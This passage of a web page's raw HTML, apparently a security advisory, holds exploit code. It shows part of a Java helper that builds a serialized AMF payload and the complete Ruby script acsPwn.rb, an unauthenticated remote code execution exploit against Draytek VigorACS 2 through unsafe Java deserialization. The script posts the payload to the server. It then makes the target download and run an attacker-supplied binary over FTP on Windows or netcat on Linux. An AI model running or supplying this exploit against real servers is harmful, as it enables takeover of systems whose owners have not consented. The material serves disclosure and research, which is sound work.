class=\"crayon-e\">printStackTrace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e92123676472-19\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e92123676472-20\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e92123676472-21\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e92123676472-22\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-m\">public<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">static<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">Object<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">generateUnicastRef<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">host<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e92123676472-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">rmi<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">server<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">ObjID <\/span><span class=\"crayon-v\">objId<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">rmi<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">server<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">ObjID<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e92123676472-24\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sun<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">rmi<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">transport<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">tcp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">TCPEndpoint <\/span><span class=\"crayon-v\">endpoint<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sun<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">rmi<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">transport<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">tcp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">TCPEndpoint<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">host<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e92123676472-25\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sun<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">rmi<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">transport<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">LiveRef <\/span><span class=\"crayon-v\">liveRef<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sun<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">rmi<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">transport<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">LiveRef<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">objId<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">endpoint<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">false<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e92123676472-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sun<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">rmi<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">server<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">UnicastRef<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">liveRef<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e92123676472-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e92123676472-28\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e92123676472-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-m\">public<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">static<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">byte<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">serialize<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">Object<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">throws<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">IOException<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e92123676472-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">MessageBody <\/span><span class=\"crayon-v\">body<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">MessageBody<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e92123676472-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">body<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">setData<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e92123676472-32\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e92123676472-33\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">ActionMessage <\/span><span class=\"crayon-v\">message<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ActionMessage<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e92123676472-34\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">message<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">addBody<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">body<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e92123676472-35\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e92123676472-36\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">ByteArrayOutputStream <\/span><span class=\"crayon-v\">out<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ByteArrayOutputStream<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e92123676472-37\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e92123676472-38\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">AmfMessageSerializer <\/span><span class=\"crayon-v\">serializer<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">AmfMessageSerializer<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e92123676472-39\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">serializer<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">initialize<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">SerializationContext<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getSerializationContext<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">out<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">null<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e92123676472-40\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">serializer<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">writeMessage<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">message<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e92123676472-41\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e92123676472-42\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">out<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">toByteArray<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e92123676472-43\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e92123676472-44\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0059 seconds] -->  <\/p>\n<p><strong>acsPwn.rb<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5ad7c457c2e97650259174\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<p><span class=\"crayon-language\">Ruby<\/span><\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/usr\/bin\/ruby    =begin  ===  acsFlex.jar:    import flex.messaging.io.amf.MessageBody;  import flex.messaging.io.amf.ActionMessage;  import flex.messaging.io.SerializationContext;  import flex.messaging.io.amf.AmfMessageSerializer;  import java.io.*;    public class ACSFlex {      public static void main(String[] args) {          Object unicastRef = generateUnicastRef(args[0], Integer.parseInt(args[1]));          \/\/ serialize object to AMF message          try {              byte[] amf = new byte[0];              amf = serialize((unicastRef));              DataOutputStream os = new DataOutputStream(new FileOutputStream(args[2]));              os.write(amf);              System.out.println(&#8220;Done, payload written to &#8221; + args[2]);          } catch (IOException e) {              e.printStackTrace();          }      }        public static Object generateUnicastRef(String host, int port) {          java.rmi.server.ObjID objId = new java.rmi.server.ObjID();          sun.rmi.transport.tcp.TCPEndpoint endpoint = new sun.rmi.transport.tcp.TCPEndpoint(host, port);          sun.rmi.transport.LiveRef liveRef = new sun.rmi.transport.LiveRef(objId, endpoint, false);          return new sun.rmi.server.UnicastRef(liveRef);      }        public static byte[] serialize(Object data) throws IOException {          MessageBody body = new MessageBody();          body.setData(data);            ActionMessage message = new ActionMessage();          message.addBody(body);            ByteArrayOutputStream out = new ByteArrayOutputStream();            AmfMessageSerializer serializer = new AmfMessageSerializer();          serializer.initialize(SerializationContext.getSerializationContext(), out, null);          serializer.writeMessage(message);            return out.toByteArray();      }  }  ===  ysoserial.jar:  &#8211; Use the multiarg branch of https:\/\/github.com\/frohoff\/ysoserial  &#8211; Or patch ysoserial with CommonsCollections5Chained and CommonsCollections6Chain from https:\/\/github.com\/frohoff\/ysoserial\/issues\/71  ===  =end    require &#8216;ftpd&#8217;  require &#8216;tmpdir&#8217;  require &#8216;net\/http&#8217;  require &#8216;uri&#8217;    class String  \tdef black;          &#8220;e[30m#{self}e[0m&#8221; end  \tdef red;            &#8220;e[31m#{self}e[0m&#8221; end  \tdef green;          &#8220;e[32m#{self}e[0m&#8221; end  \tdef brown;          &#8220;e[33m#{self}e[0m&#8221; end  \tdef blue;           &#8220;e[34m#{self}e[0m&#8221; end  \tdef magenta;        &#8220;e[35m#{self}e[0m&#8221; end  \tdef cyan;           &#8220;e[36m#{self}e[0m&#8221; end  \tdef gray;           &#8220;e[37m#{self}e[0m&#8221; end    \tdef bg_black;       &#8220;e[40m#{self}e[0m&#8221; end  \tdef bg_red;         &#8220;e[41m#{self}e[0m&#8221; end  \tdef bg_green;       &#8220;e[42m#{self}e[0m&#8221; end  \tdef bg_brown;       &#8220;e[43m#{self}e[0m&#8221; end  \tdef bg_blue;        &#8220;e[44m#{self}e[0m&#8221; end  \tdef bg_magenta;     &#8220;e[45m#{self}e[0m&#8221; end  \tdef bg_cyan;        &#8220;e[46m#{self}e[0m&#8221; end  \tdef bg_gray;        &#8220;e[47m#{self}e[0m&#8221; end    \tdef bold;           &#8220;e[1m#{self}e[22m&#8221; end  \tdef italic;         &#8220;e[3m#{self}e[23m&#8221; end  \tdef underline;      &#8220;e[4m#{self}e[24m&#8221; end  \tdef blink;          &#8220;e[5m#{self}e[25m&#8221; end  \tdef reverse_color;  &#8220;e[7m#{self}e[27m&#8221; end  end      # FTP server (Windows)  class Driver  \tdef initialize(temp_dir)  \t\t@temp_dir = temp_dir  \tend    \tdef authenticate(user, password)  \t\t# actually the client hasn&#8217;t downloaded it yet, just logged in, but whatever  \t\tputs &#8216;[+] Payload has been downloaded, wait for execution!&#8217;.green.bold  \t\ttrue  \tend    \tdef file_system(user)  \t\tFtpd::DiskFileSystem.new(@temp_dir)  \tend  end    def ftp_start (temp_dir, lhost, port)  \tdriver = Driver.new(temp_dir)    server = Ftpd::FtpServer.new(driver)  \tserver.interface = lhost    server.port = port     server.start  end      def tcp_start (payload, port)  \tpl = File.binread(payload)  \tserver = TCPServer.new port  \tloop do  \t\tThread.start(server.accept) do |client|  \t\tclient.write(pl)  \t\tclient.close  \t\tputs &#8220;[+] Payload has been downloaded, wait for execution!&#8221;.green.bold  \t\tend  \tend  end    puts &#8220;&#8221;  puts &#8220;Draytek VigorACS 2 unauthenticated remote code execution (unsafe Java AMF deserialization)&#8221;.cyan.bold  puts &#8220;CVE-TODO&#8221;.cyan.bold  puts &#8220;Tested on version 2.2.1 for Windows and Linux, earlier versions are likely vulnerable&#8221;.cyan.bold  puts &#8220;By Pedro Ribeiro (pedrib@gmail.com) \/ Agile Information Security&#8221;.blue.bold  puts &#8220;&#8221;    if (ARGV.length &lt; 5 || (ARGV[3] != &#8220;Linux&#8221; &amp;&amp; ARGV[3] != &#8220;Windows&#8221;) || !File.file?(ARGV[4]))  \tputs &#8220;Usage: .\/acsPwn.rb &lt;rhost&gt; &lt;rport&gt; &lt;lhost&gt; &lt;Windows|Linux&gt; &lt;payload_path&gt; [ssl]&#8221;.bold  \tputs &#8221;\trhost:tttDraytek Vigor ACS server host&#8221;  \tputs &#8221;\trport:tttDraytek Vigor ACS server port&#8221;  \tputs &#8221;\tlhost:tttyour IP address&#8221;  \tputs &#8221;\tWindows|Linux:tttarget type&#8221;  \tputs &#8221;\tpayload_path:ttPath to the payload that is going to be executed in the Vigor server&#8221;  \tputs &#8221;\tssl:tttConnects to Vigor server using SSL (by default uses plain HTTP)&#8221;  \tputs &#8220;&#8221;  \tputs &#8220;NOTES:tThis exploit requires the ftpd gem installed and the java executable in the PATH.&#8221;   \tputs &#8220;tThe included ysoserial.jar (patched for multiarg) and the included acsFlex.jar must be in the current directory.&#8221;  \tputs &#8220;tTwo random TCP ports in the range 10000-65535 are used to receive connections from the target.&#8221;  \tputs &#8220;&#8221;  \texit(-1)  end    # we can use ysoserial&#8217;s CommonsCollections5 or CommonsCollections6 exploit chain  YSOSERIAL = &#8220;ysoserial-patched.jar ysoserial.exploit.JRMPListener JRMP_PORT CommonsCollections6Chained &#8221;  WINDOWS_CMD = %{&#8216;cmd.exe \/c @echo open SERVER PORT&gt;script.txt&amp;@echo binary&gt;&gt;script.txt&amp;@echo get \/PAYLOAD&gt;&gt;script.txt&amp;@echo quit&gt;&gt;script.txt&amp;@ftp -s:script.txt -v -A&amp;@start PAYLOAD&#8217;}  LINUX_CMD = %{&#8216;nc -w 2 SERVER PORT &gt; \/tmp\/PAYLOAD; chmod +x \/tmp\/PAYLOAD; \/tmp\/PAYLOAD&#8217;}    rhost = ARGV[0]  rport = ARGV[1]  lhost = ARGV[2].dup.force_encoding(&#8216;ASCII&#8217;)  os = ARGV[3]  payload_path = ARGV[4]  payload_name = File.basename(ARGV[4])  if ARGV.length &gt; 5 &amp;&amp; ARGV[5] == &#8216;ssl&#8217;  \tssl = true  else  \tssl = false  end    Dir.mktmpdir { |temp_dir|  \tserver_port = rand(10000..65535)  \tFileUtils.cp(payload_path, temp_dir)    \tputs &#8220;[+] Picked port #{server_port} for the #{(os == &#8216;Windows&#8217; ? &#8216;FTP&#8217; : &#8216;TCP&#8217;)} server&#8221;.cyan.bold    \t# step 1: start the TCP or FTP server  \tif os == &#8216;Windows&#8217;  \t\tftp_start(temp_dir, lhost, server_port)  \telse  \t\tt = Thread.new{tcp_start(payload_path, server_port)}  \tend  \t  \t# step 2: create the AMF payload  \tputs &#8220;[+] Creating AMF payload&#8230;&#8221;.green.bold  \tjrmp_port = rand(10000..65535)  \t  \tamf_file = temp_dir + &#8220;\/payload.ser&#8221;  \tsystem(&#8220;java -jar acsFlex.jar #{lhost} #{jrmp_port} #{amf_file}&#8221;)  \tamf_payload = File.binread(amf_file)     \t# step 3: start the ysoserial JRMP listener  \tputs &#8220;[+] Picked port #{jrmp_port} for the JRMP server&#8221;.cyan.bold  \t  \t# build the command line argument that will be executed by the server  \tcmd = (os == &#8216;Windows&#8217; ? &#8220;java &#8221; : &#8220;java -Dysoserial.prefix=&#8217;\/bin\/sh -c&#8217; &#8220;)  \tcmd += &#8220;-cp #{YSOSERIAL.gsub(&#8216;JRMP_PORT&#8217;, jrmp_port.to_s)}&#8221;  \tcmd_final = (os == &#8216;Windows&#8217; ? WINDOWS_CMD : LINUX_CMD).gsub(&#8220;SERVER&#8221;, lhost).gsub(&#8220;PORT&#8221;, server_port.to_s).gsub(&#8220;PAYLOAD&#8221;, payload_name)  \tputs &#8220;[+] Sending command #{cmd_final}&#8221;.green.bold  \t  \tjrmp_pid = spawn((cmd + cmd_final))  \tsleep 5  \tProcess.detach(jrmp_pid)    \t# step 4: fire the payload!  \turi = URI.parse(&#8220;http#{ssl ? &#8216;s&#8217;: &#8221;}:\/\/#{rhost}:#{rport}&#8221;)  \t  \tNet::HTTP.start(uri.host, uri.port, (ssl ? {:use_ssl =&gt; true, :verify_mode =&gt; OpenSSL::SSL::VERIFY_NONE } : {})) do |http|  \t\thttp.post(&#8216;\/ACSServer\/messagebroker\/amf&#8217;, amf_payload)  \tend    \tputs &#8220;[+] AMF payload sent, waiting 15 seconds for payload download&#8230;&#8221;.green.bold  \tsleep 15  \tProcess.kill(&#8220;HUP&#8221;, jrmp_pid)  \tif t  \t\tt.terminate  \tend  \tputs &#8220;[*] Payload should have executed by now, exiting!&#8221;.bold  }  exit 0<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ad7c457c2e97650259174-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ad7c457c2e97650259174-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" 